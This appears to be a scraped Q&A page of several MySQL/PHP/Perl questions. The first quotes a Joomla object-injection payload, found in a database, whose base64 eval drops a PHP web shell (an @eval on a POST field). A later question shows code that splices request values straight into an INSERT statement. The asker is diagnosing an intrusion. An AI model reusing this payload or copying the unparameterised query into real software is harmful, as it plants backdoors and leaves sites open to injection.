SQL injection Am I safe? - mysql

Today I saw this in my sql database:
| *some data* | }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:
{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:
{}s:8:"feed_url";s:207:"
eval(base64_decode(ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2xkcC5waHAnLCdFRTlBQUVFQzREOEU0NDM5Mjk5MDQ2QjhDREIzRjc4MiA8P3BocCBAZXZhbCgkX1BPU1RbImZrIl0pOycpOw));
JFactory::getConfig();
exit;";
s:19:"cache_name_function";
s:6:"assert";s:5:"cache"
;b:1;s:11:"cache_class";
O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}� |
I`m using this code to put data into database :
// Create connection
$conn = new mysqli($servername, $username, $password, $dbname);
// Check connection
if ($conn->connect_error) {
die("Connection failed: " . $conn->connect_error);
}
$stmt = $conn->prepare("INSERT INTO $TABLE (VALUE, DEVICE) VALUES (?, ?)");
$stmt->bind_param("ss", $VALUE, $DEVICE);
$stmt->execute();
$stmt->close();
$conn->close();
?>
Am i safe ?
Is my code secure or should I add another layer of security?

Related

Remote Connection to Server failed

I want to connect to a server hosted online.
My code connects to local host but when i change the values to the hosted server it gives me an error
Warning: mysqli_connect(): (HY000/2002): No connection could be made because the target machine actively refused it.
<?php
$servername = "zamokuhleWeb.co.za";
$username = "*****";
$password = "****";
// Create connection
$conn = mysqli_connect($servername, $username, $password);
// Check connection
if (!$conn) {
die("Connection failed: " . mysqli_connect_error());
}
echo "Connected successfully";
?>
I want to the access the database and get certain information from it
<?php
$servername = "localhost";
$username = "*****";
$password = "****";
// Create connection
$conn = mysqli_connect($servername, $username, $password);
// Check connection
if (!$conn) {
die("Connection failed: " . mysqli_connect_error());
}
echo "Connected successfully";
?>

How to forward a connection failed MySQL to a error page (500)

We made a simple php webpage with a InnoDB tabel, to monitor if InnoDB goes down.
When InnoDB / Mysql goes down we get a error: Connection failed: Can't connect to local MySQL server through socket '/var/lib/mysql/mysql.sock' (2 "No such file or directory")
But we wanna forward this to a custom error. Lik: InnoDB IS DOWN!!!
Any suggestions how we can do this?
<?php
$servername = "localhost";
$username = "root";
$password = "**************";
$dbname = "innodb";
// Create connection
$conn = new mysqli($servername, $username, $password, $dbname);
// Check connection
if ($conn->connect_error) {
die("Connection failed: " . $conn->connect_error);
}
$sql = "SELECT status FROM monitoring";
$result = $conn->query($sql);
if ($result->num_rows > 0) {
// output data of each row
while($row = $result->fetch_assoc()) {
echo "De status van InnoDB is: " . $row["status"]. "<br>";
}
} else {
echo "0 results";
}
$conn->close();
?>
It's simple, use something like this
<?php
// Configuration of database
// Check connection
if ($conn->connect_error) {
// die("InnoDB IS DOWN");
// OR
echo "<p>InnoDB IS DOWN</p>";
exit();
}
// Rest of your code
OR you may include an HTML page as well in the IF condition if ($conn->connect_error) like:
// Check connection
if ($conn->connect_error) {
include 'error_page.html';
exit();
}
// Rest of your code

Mysql error while updating data using perl language

Update function
I am getting an error while updating data from database.
sub update
{
my $sql = "UPDATE Data SET NAME = ?, ADDRESS=?, PHONE_NO=?,
DATE_OF_JOINING=?, ROLE_ASSIGN=?, SALARY=? WHERE ID = ?";
my $sth = $dbh->prepare($sql);
print("Enter ID to update : ");
chomp(my $ID = <STDIN>);
print("NAME : ");
chomp(my $NAME = <STDIN>);
print("ADDRESS : ");
chomp(my $ADDRESS = <STDIN>);
print("PHONE_NO : ");
chomp(my $PHONE_NO = <STDIN>);
print("DATE_OF_JOINING : ");
chomp(my $DATE_OF_JOINING = <STDIN>);
print("ROLE_ASSIGN : ");
chomp(my $ROLE_ASSIGN = <STDIN>);
print("SALARY : ");
chomp(my $SALARY = <STDIN>);
$sth->bind_param(1,$NAME);
$sth->bind_param(2,$ADDRESS);
$sth->bind_param(3,$PHONE_NO);
$sth->bind_param(4,$DATE_OF_JOINING);
$sth->bind_param(5,$ROLE_ASSIGN);
$sth->bind_param(6,$SALARY);
$sth->bind_param(7,$ID);
$sth->execute();
print("The record has been updated successfully!");
$sth->finish();
$dbh->disconnect();
}
After executing above function when i try to view updated data :
sub query_links
{
my ($dbh) = #_;
my $sql = "SELECT * FROM Data";
my $sth = $dbh->prepare($sql) or die $DBI::errstr;
$sth->execute() or die $DBI::errstr;
$sth->dump_results();
$sth->finish();
}
Error:
DBD::mysql::st execute failed: MySQL server has gone away at mini.plx line 94,
<STDIN> line 9.MySQL server has gone away
The error message means that the connection to your database has been lost.
You don't show us any code that creates your connection, so it's hard to know what might have gone wrong there. You might consider adding the mysql_auto_reconnect flag when connecting to the database.
my $dbh = DBI->connect($dsn, $user, $password, {
mysql_auto_reconnect => 1,
});
You can also change this setting after the database connection has been set up.
$dbh->{mysql_auto_reconnect} = 1;
Update: As ikegami points out in a comment, you disconnect from the database at the end of update() - and you don't show any code demonstrating that you reconnect before using the connection again in query_links(). That will cause this problem.

getting error back from Prepared statement in case sql injection

I'm trying to test my prepared statement that is protecting one field to get the error message in case of SQL injection. I tried until now thousands of attacks, and all of the values I gave were accepted. Am I using a wrong syntax or attack? I can't see where the problem is. Here is my code:
try {
// $host = "localhost";
// $username = "root";
// $password = "root";
// $db_name = "pokemon";
$conn = new PDO('mysql:host='.$host.';dbname='.$db_name.';', $username, $password);
// set the PDO error mode to exception
$conn->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$meldung="";
$name =$_REQUEST['name'];
$gewicht = $_REQUEST['Gewicht'];
$größe =$_REQUEST['Größe'];
$spezies = $_REQUEST['Spezies'];
$stufe =$_REQUEST['Stufe'];
$atacke =$_REQUEST['Attacke'];
$array = explode(',', $_REQUEST['Attacke']);
$stmt = $conn->prepare("INSERT INTO Pokemon (`Name`,`Gewicht`,`grosse`,`spezies`,`stufe`) VALUES (:Name, '".$gewicht."', '".$größe."', '".$spezies."', '".$stufe."')");
$stmt->bindParam(':Name', $name);
// $stmt->bindParam(':Gewicht', $gewicht);
// $stmt->bindParam(':grosse', $größe);
// $stmt->bindParam(':spezies', $spezies);
// $stmt->bindParam(':stufe', $stufe);
$stmt->execute();
}
catch(PDOException $e)
{
$meldung = "Error: " . $e->getMessage();
echo $meldung;
}
thanks

Detecting error/invalid/illegal queries using PDO driver (MySQL + PHP)

I just changed all my code from the old mysql driver to PDO.
So far I find that a lot of basic functionalities doesn't exist! Ex. no equivalency to mysql_num_row .. and so on (but that's not the point of this post :/ )
Usually with mysql driver, I'd do:
$result = mysql_query($query);
if(!$result){
displayError(mysql_error());
}
How do you do similar thing using PDO?
Have a look at the documentation here there are 3 modes :
PDO::ERRMODE_SILENT (default)
PDO::ERRMODE_WARNING
PDO::ERRMODE_EXCEPTION
I suggest you enable the last, which causes an exception to be thrown on error :
$pdo = new PDO($dsn,$user,$pass,$options); // Example connection
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
then surround your statement in a try/catch block
try {
// your query here
} catch (PDOException $e) {
echo 'Query failed: ' . $e->getMessage();
}
Separate note - mysql_num_row in PDO :
$sql = "SELECT count(*) FROM `table` WHERE x = y";
$result = $con->prepare($sql);
$result->execute();
$number_of_rows = $result->fetchColumn()
Use try { } catch {}
<?php
$dsn = 'mysql:dbname=testdb;host=127.0.0.1';
$user = 'dbuser';
$password = 'dbpass';
try {
$dbh = new PDO($dsn, $user, $password);
$dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
} catch (PDOException $e) {
echo 'Connection failed: ' . $e->getMessage();
}
?>
Reference